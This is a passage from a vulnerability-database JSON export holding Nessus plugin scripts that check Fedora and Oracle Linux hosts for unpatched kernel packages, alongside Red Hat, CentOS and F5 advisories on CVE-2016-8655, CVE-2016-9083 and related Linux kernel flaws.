stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-96d276367e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-96d276367e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.8.6-201.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\nkernel-uek\n[4.1.12-61.1.27.el7uek]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) \n[Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus \nTorvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen \nHofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n\n[4.1.12-61.1.26.el7uek]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) \n [Orabug: 25445336]\n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas \nCassel) [Orabug: 25458076]\n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076]\n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) \n[Orabug: 25430143]", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-08T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3514)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-9576", "CVE-2016-8646"], "modified": "2017-02-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3514.NASL", "href": "https://www.tenable.com/plugins/nessus/97057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97057);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8630\", \"CVE-2016-8646\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9576\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3514)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[4.1.12-61.1.27.el7uek]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) \n[Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus \nTorvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen \nHofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n\n[4.1.12-61.1.26.el7uek]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) \n [Orabug: 25445336]\n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas \nCassel) [Orabug: 25458076]\n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076]\n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) \n[Orabug: 25430143]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006699.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006700.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8630\", \"CVE-2016-8646\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9576\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3514\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.27.el6uek-0.5.3-2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.27.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.27.el7uek-0.5.3-2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.27.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nBug Fix(es):\n\n* Previously, the asynchronous page fault woke code references spinlocks, which were actually sleeping locks in the RT kernel. Because of this, when the code was executed from the exception context, a bug warning appeared on the console. With this update, the regular wait queue and spinlock code in this area has been modified to use simple-wait-queue and raw-spinlocks. This code change enables the asynchronous page fault code to run in a non-preemptable state without bug warnings. (BZ#1418035)", "modified": "2018-03-19T16:29:53", "published": "2017-03-02T20:22:34", "id": "RHSA-2017:0387", "href": "https://access.redhat.com/errata/RHSA-2017:0387", "type": "redhat", "title": "(RHSA-2017:0387) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:56", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2940041.", "modified": "2018-04-12T03:33:35", "published": "2017-03-02T20:22:31", "id": "RHSA-2017:0386", "href": "https://access.redhat.com/errata/RHSA-2017:0386", "type": "redhat", "title": "(RHSA-2017:0386) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\nRed Hat would like to thank Philip Pettersson for reporting this issue.\n\nEnhancement(s):\n\n* Previously, the Broadcom bnx2x driver in the MRG kernel-rt used an incorrect PTP Hardware Clock (PHC) timer divisor value, which broke Precision Time Protocol (PTP) timestamping due to an unstable clock. This update corrects the divisor value, and the PTP timestamping is now accurate, with monotonically increasing timestamp values. (BZ#1411139)", "modified": "2018-06-07T08:58:26", "published": "2017-03-02T20:47:05", "id": "RHSA-2017:0402", "href": "https://access.redhat.com/errata/RHSA-2017:0402", "type": "redhat", "title": "(RHSA-2017:0402) Important: kernel-rt security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0386\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2940041.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-March/034362.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0386.html", "edition": 4, "modified": "2017-03-06T15:04:15", "published": "2017-03-06T15:04:15", "href": "http://lists.centos.org/pipermail/centos-announce/2017-March/034362.html", "id": "CESA-2017:0386", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-02-15T18:35:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-8655"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:57:00", "published": "2016-12-23T00:06:00", "id": "F5:K38472857", "href": "https://support.f5.com/csp/article/K38472857", "title": "Kernel vulnerability CVE-2016-8655", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:39:32", "bulletinFamily": "software", "cvelist": ["CVE-2016-8655", "CVE-2017-1000111"], "description": "\nF5 Product Development has assigned ID 710148 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H44309215 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 14.x | None | Not applicable | Not vulnerable2 | None | None \n13.x | None | Not Applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2These products contain the affected code. However, F5 has determined the vulnerability status to be Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 